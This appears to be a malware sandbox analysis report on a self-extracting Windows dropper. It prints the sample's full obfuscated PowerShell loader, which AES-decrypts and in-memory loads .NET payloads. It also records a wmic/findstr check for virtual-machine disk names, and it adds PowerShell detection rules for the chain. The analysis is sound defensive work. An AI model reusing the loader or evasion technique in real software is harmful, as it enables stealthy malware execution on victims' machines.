                    Source: Binary string: wextract.pdb source: XgKnAQpuPM.exe
                    Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Xml.ni.pdbRSDS# source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Core.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Numerics.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.DirectoryServices.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.Management.Infrastructure.pdbl source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: mscorlib.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Configuration.Install.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Xml.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.PowerShell.Security.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: wextract.pdbGCTL source: XgKnAQpuPM.exe
                    Source: Binary string: System.ni.pdbRSDS source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.CSharp.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.DirectoryServices.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Xml.pdbP4~ source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Configuration.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Configuration.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Data.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Data.ni.pdbRSDSC source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Configuration.Install.pdbP source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Xml.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.DirectoryServices.pdb` source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Management.Automation.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Data.pdbH source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Management.Automation.ni.pdbRSDS source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Management.Automation.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: mscorlib.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Management.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Management.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Core.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Transactions.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Transactions.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Transactions.ni.pdbRSDS source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Numerics.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Core.ni.pdbRSDS source: WERAC0C.tmp.dmp.10.dr
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe, Code function: 0_2_00007FF776D12034 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA
Source: unknown, DNS traffic detected: query: 198.187.3.20.in-addr.arpa reply code: Name error (3)
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, DNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
Source: powershell.exe, 00000007.00000002.2185544424.000001C69008B000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000007.00000002.2029388668.000001C6802D2000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000007.00000002.2029388668.000001C680001000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.10.dr, String found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000007.00000002.2029388668.000001C6802D2000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000007.00000002.2029388668.000001C680001000.00000004.00000001.00020000.00000000.sdmp, Null.7.dr, String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000007.00000002.2029388668.000001C680001000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000007.00000002.2029388668.000001C680001000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: https://aka.ms/pscore6xG
Source: powershell.exe, 00000007.00000002.2185544424.000001C69008B000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000007.00000002.2185544424.000001C69008B000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000007.00000002.2185544424.000001C69008B000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000007.00000002.2029388668.000001C6802D2000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000007.00000002.2185544424.000001C69008B000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: https://nuget.org/nuget.exe

                    System Summary

Source: Process Memory Space: powershell.exe PID: 3352, type: MEMORYSTR, Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Author: ditekSHen
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe, Code function: 0_2_00007FF776D12D97 GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe, Code function: 0_2_00007FF776D11BF4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Windows\$rbx-onimai2
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe, Code function: 0_2_00007FF776D11D10
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe, Code function: 0_2_00007FF776D16F14
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe, Code function: 0_2_00007FF776D168F0
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe, Code function: 0_2_00007FF776D141B4
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe, Code function: 0_2_00007FF776D12F7B
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe, Code function: 0_2_00007FF776D15F80
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe, Code function: 0_2_00007FF776D11BF4
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe, Code function: 0_2_00007FF776D15F7E
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe, Code function: 0_2_00007FF776D1366E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3352 -s 1576
Source: XgKnAQpuPM.exe, Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, Windows 2000/XP setup, 3397176 bytes, 1 file, at 0x2c +A "vclib.bat", ID 885, number 1, 157 datablocks, 0x1503 compression
Source: XgKnAQpuPM.exe, Binary or memory string: OriginalFilename vs XgKnAQpuPM.exe
Source: XgKnAQpuPM.exe, Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs XgKnAQpuPM.exe
Source: C:\Windows\System32\cmd.exe, Process created: Commandline size = 2701
Source: Process Memory Space: powershell.exe PID: 3352, type: MEMORYSTR, Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine, Classification label: mal92.expl.evad.winEXE@14/11@1/0
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe, Code function: 0_2_00007FF776D16F14 GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe, Code function: 0_2_00007FF776D11BF4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe, Code function: 0_2_00007FF776D16F14 GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe, Code function: 0_2_00007FF776D12F7B CreateEventA,SetEvent,CreateMutexA,GetLastError,CloseHandle,FindResourceExA,LoadResource,#17
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Mutant created: NULL
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6736:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Mutant created: \Sessions\1\BaseNamedObjects\7749332
Source: C:\Windows\System32\WerFault.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3352
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe, File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe, Process created: C:\Windows\System32\cmd.exe cmd /c "vclib.bat"
Source: XgKnAQpuPM.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe, Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown, Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\"
Source: unknown, Process created: C:\Users\user\Desktop\XgKnAQpuPM.exe "C:\Users\user\Desktop\XgKnAQpuPM.exe"
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe, Process created: C:\Windows\System32\cmd.exe cmd /c "vclib.bat"
Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"QEMU HARDDISK" /c:"WDS100T2B0A"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function FpxON($kXGHT){ $MjRuR=[System.Security.Cryptography.Aes]::Create(); $MjRuR.Mode=[System.Security.Cryptography.CipherMode]::CBC; $MjRuR.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $MjRuR.Key=[System.Convert]::FromBase64String('j3+l8MVXgSNKBboFFtDIY9ifLLQEhU8Shlqb9W611kU='); $MjRuR.IV=[System.Convert]::FromBase64String('C7Dlt1nshFAIyjxeP0iXIQ=='); $WVvmF=$MjRuR.CreateDecryptor(); $CVTyC=$WVvmF.TransformFinalBlock($kXGHT, 0, $kXGHT.Length); $WVvmF.Dispose(); $MjRuR.Dispose(); $CVTyC;}function ogptr($kXGHT){ Invoke-Expression '$bJDne=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$kXGHT);'.Replace('blck', ''); Invoke-Expression '$eTtPQ=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$gtTnv=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($bJDne, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $gtTnv.CopyTo($eTtPQ); $gtTnv.Dispose(); $bJDne.Dispose(); $eTtPQ.Dispose(); $eTtPQ.ToArray();}function VcYYT($kXGHT,$GOojW){ Invoke-Expression '$CHMLi=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$kXGHT);'.Replace('blck', ''); Invoke-Expression '$WMCoT=$CHMLi.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$WMCoT.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $GOojW)blck;'.Replace('blck', '');}$YesWH 
= 'C:\Users\user\AppData\Local\Temp\IXP000.TMP\vclib.bat';$host.UI.RawUI.WindowTitle = $YesWH;$lzgCG=[System.IO.File]::ReadAllText($YesWH).Split([Environment]::NewLine);foreach ($zwDbB in $lzgCG) { if ($zwDbB.StartsWith(':: ')) { $gGIZq=$zwDbB.Substring(3); break; }}$nciXK=[string[]]$gGIZq.Split('\');Invoke-Expression '$mmTjj=ogptr (FpxON (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($nciXK[0])));'.Replace('blck', '');Invoke-Expression '$gDpGZ=ogptr (FpxON (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($nciXK[1])));'.Replace('blck', '');VcYYT $mmTjj (,[string[]] (''));VcYYT $gDpGZ (,[string[]] (''));
                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3352 -s 1576
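
                    The process creations above describe one chain. The sample is a wextract self-extracting package (the wextract.pdb string, the IXP000.TMP drop directory, the RunOnce wextract_cleanup0 value and the advpack.dll,DelNodeRunDLL32 cleanup are all stock wextract behaviour). It runs cmd /c "vclib.bat"; the batch file enumerates disk models with wmic diskdrive get Model and feeds them to findstr for three disk model strings the author treats as analysis-environment markers (QEMU HARDDISK is the QEMU/KVM default virtual disk name), and branches on the result (the branch itself is not in the report). It then runs cmd.exe /c echo <PowerShell source> | powershell.exe -WindowStyle Hidden, which is why the powershell.exe command line carries nothing but -WindowStyle Hidden: the script arrives over stdin, and only the cmd.exe side of the pipe shows it. The following is an added example, not part of this report, of detection logic for that chain written over constructed Sysmon Event ID 1 style records (field names follow Sysmon; the process IDs, the truncated echo argument and the benign control record are made up for the demo):

```powershell
# Added example, not part of the sandbox report: detection logic for the vclib.bat
# process chain, run over constructed Sysmon Event ID 1 (process creation) style
# records. Field names follow Sysmon; PIDs, the truncated echo argument and the
# benign control record at the end are made up for the demo.
$events = @(
    [pscustomobject]@{ ProcessId = 4100; ParentProcessId = 3900; Image = 'C:\Windows\System32\cmd.exe'
                       ParentImage = 'C:\Users\user\Desktop\XgKnAQpuPM.exe'; CommandLine = 'cmd /c "vclib.bat"' }
    [pscustomobject]@{ ProcessId = 4120; ParentProcessId = 4100; Image = 'C:\Windows\System32\wbem\WMIC.exe'
                       ParentImage = 'C:\Windows\System32\cmd.exe'; CommandLine = 'wmic diskdrive get Model' }
    [pscustomobject]@{ ProcessId = 4130; ParentProcessId = 4100; Image = 'C:\Windows\System32\findstr.exe'
                       ParentImage = 'C:\Windows\System32\cmd.exe'
                       CommandLine = 'findstr /i /c:"DADY HARDDISK" /c:"QEMU HARDDISK" /c:"WDS100T2B0A"' }
    [pscustomobject]@{ ProcessId = 4140; ParentProcessId = 4100; Image = 'C:\Windows\System32\cmd.exe'
                       ParentImage = 'C:\Windows\System32\cmd.exe'
                       # truncated copy of the captured argument; doubled single quotes are PowerShell escaping
                       CommandLine = 'cmd.exe /c echo function FpxON($kXGHT){ $MjRuR=[System.Security.Cryptography.Aes]::Create(); ... Invoke-Expression ''$CHMLi=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$kXGHT);''.Replace(''blck'', '''') ... [System.Convert]::FromBase64String($nciXK[0]) ...' }
    [pscustomobject]@{ ProcessId = 4150; ParentProcessId = 4100; Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       ParentImage = 'C:\Windows\System32\cmd.exe'; CommandLine = 'powershell.exe -WindowStyle Hidden' }
    [pscustomobject]@{ ProcessId = 4160; ParentProcessId = 3900; Image = 'C:\Windows\System32\rundll32.exe'
                       ParentImage = 'C:\Users\user\Desktop\XgKnAQpuPM.exe'
                       CommandLine = '"C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\"' }
    # benign control: a scheduled script started the normal way, must not fire
    [pscustomobject]@{ ProcessId = 5000; ParentProcessId = 1200; Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       ParentImage = 'C:\Windows\explorer.exe'; CommandLine = 'powershell.exe -NoProfile -File C:\scripts\backup.ps1' }
)

# Per-event rules. -match is case-insensitive by default in PowerShell.
$rules = @(
    @{ Name = 'WMIC disk model enumeration (VM/sandbox fingerprinting)'
       Test = { param($e) $e.Image -like '*\WMIC.exe' -and $e.CommandLine -match 'diskdrive\s+get\s+model' } }
    @{ Name = 'findstr against known analysis-VM disk model strings'
       Test = { param($e) $e.Image -like '*\findstr.exe' -and $e.CommandLine -match 'QEMU HARDDISK|DADY HARDDISK|WDS100T2B0A' } }
    @{ Name = 'PowerShell source carried in a cmd.exe echo argument'
       Test = { param($e) $e.Image -like '*\cmd.exe' -and $e.CommandLine -match '^cmd(\.exe)?\s+/c\s+echo\s' -and
                          $e.CommandLine -match 'Invoke-Expression|FromBase64String|\.Replace\(' } }
    @{ Name = 'wextract temp directory cleanup (advpack DelNodeRunDLL32 on IXPnnn.TMP)'
       Test = { param($e) $e.Image -like '*\rundll32.exe' -and $e.CommandLine -match 'advpack\.dll,DelNodeRunDLL32.*\\IXP\d{3}\.TMP' } }
)

# Cross-event rule: powershell.exe whose command line names no script (no -Command/-File/
# -EncodedCommand or their short forms) and whose parent also spawned a 'cmd /c echo ...'
# child. The script came through the pipe, so the powershell.exe command line alone looks
# harmless; Script Block Logging (Event ID 4104) is where its content is recoverable.
function Find-StdinFedPowerShell {
    param([object[]]$Events)
    foreach ($ps in ($Events | Where-Object { $_.Image -like '*\powershell.exe' })) {
        if ($ps.CommandLine -match '\s-(c|command|f|file|e|ec|enc|encodedcommand)\b') { continue }
        $echo = $Events | Where-Object {
            $_.ParentProcessId -eq $ps.ParentProcessId -and $_.ProcessId -ne $ps.ProcessId -and
            $_.Image -like '*\cmd.exe' -and $_.CommandLine -match '^cmd(\.exe)?\s+/c\s+echo\s' }
        if ($echo) {
            [pscustomobject]@{ ProcessId = $ps.ProcessId
                               Rule = 'powershell.exe with no script argument, fed by sibling cmd /c echo (pull Event ID 4104)' }
        }
    }
}

function Invoke-ChainRules {
    param([object[]]$Events)
    $hits = @(foreach ($e in $Events) {
        foreach ($r in $rules) {
            if (& $r.Test $e) { [pscustomobject]@{ ProcessId = $e.ProcessId; Rule = $r.Name } }
        }
    })
    $hits + @(Find-StdinFedPowerShell -Events $Events)
}

# Expected: 4120, 4130, 4140, 4160 from the per-event rules and 4150 from the stdin rule;
# 4100 (plain batch launch) and the benign 5000 record produce nothing.
Invoke-ChainRules -Events $events | Sort-Object ProcessId | Format-Table -AutoSize -Wrap
```

                    The WMIC and findstr rules are noisy on their own (inventory scripts query Win32_DiskDrive too); what makes this chain distinctive is the combination of children under one cmd.exe parent, which is what Find-StdinFedPowerShell keys on. Because the script never appears in powershell.exe's arguments, the evidence lives in PowerShell Script Block Logging (Event ID 4104) or in the parent cmd.exe command line; the report's own capture of the echo argument is the cmd.exe side of exactly that.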
                    Source: C:\Users\user\Desktop\XgKnAQpuPM.exe | Section loaded: cabinet.dll
                    Source: C:\Users\user\Desktop\XgKnAQpuPM.exe | Section loaded: version.dll
                    Source: C:\Users\user\Desktop\XgKnAQpuPM.exe | Section loaded: feclient.dll
                    Source: C:\Users\user\Desktop\XgKnAQpuPM.exe | Section loaded: iertutil.dll
                    Source: C:\Users\user\Desktop\XgKnAQpuPM.exe | Section loaded: advpack.dll
                    Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
                    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iphlpapi.dll
                    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: framedynos.dll
                    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: msxml6.dll
                    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: urlmon.dll
                    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iertutil.dll
                    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: srvcli.dll
                    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: netutils.dll
                    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: uxtheme.dll
                    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140.dll
                    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140_1.dll
                    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: amsi.dll
                    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: profapi.dll
                    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vbscript.dll
                    Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sxs.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: faultrep.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dbghelp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dbgcore.dll
                    Source: C:\Windows\System32\wbem\WMIC.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                    Source: Window Recorder | Window detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                    Source: XgKnAQpuPM.exe | Static PE information: Image base 0x140000000 > 0x60000000
                    Source: XgKnAQpuPM.exe | Static file information: File size 3571712 > 1048576
                    Source: XgKnAQpuPM.exe | Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x359000
                    Source: XgKnAQpuPM.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                    Source: XgKnAQpuPM.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                    Source: XgKnAQpuPM.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
